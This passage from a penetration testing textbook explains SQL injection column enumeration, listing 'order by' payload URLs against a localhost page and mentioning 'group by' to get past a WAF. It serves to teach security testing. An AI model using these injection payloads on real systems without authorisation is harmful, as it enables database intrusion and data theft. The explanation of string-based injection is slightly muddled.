346
◾
Ethical Hacking and Penetration Testing Guide
When
executing this command, we get an error pointing that column number 10 does not
exist. This way we know that the number of columns is less than 10. We would continue testing
this way:
http://localhost/index.php?support=yes’ order by 9--±—Error
http://localhost/index.php?support=yes’ order by 8--±—Error
http://localhost/index.php?support=yes’ order by 8--±—Error
http://localhost/index.php?support=yes’ order by 7--±—Error
http://localhost/index.php?support=yes’ order by 6--±—No Error
When doing order by 6,
we get no error, which means our column count is 6. In a similar
manner, you can also use “group by” keyword to determine the number of columns,
in case the
order by keyword doesn’t work or it’s blacklisted by the WAF.
Note
: The reason we are using ‘ and --± is because our injection type is string. We can figure
this out as follows: In a string-based SQL injection, no matter how
much you increase the count,
you don’t get any results printed on the screen, which means that you need to append a single
quote with every query.
Dostları ilə paylaş: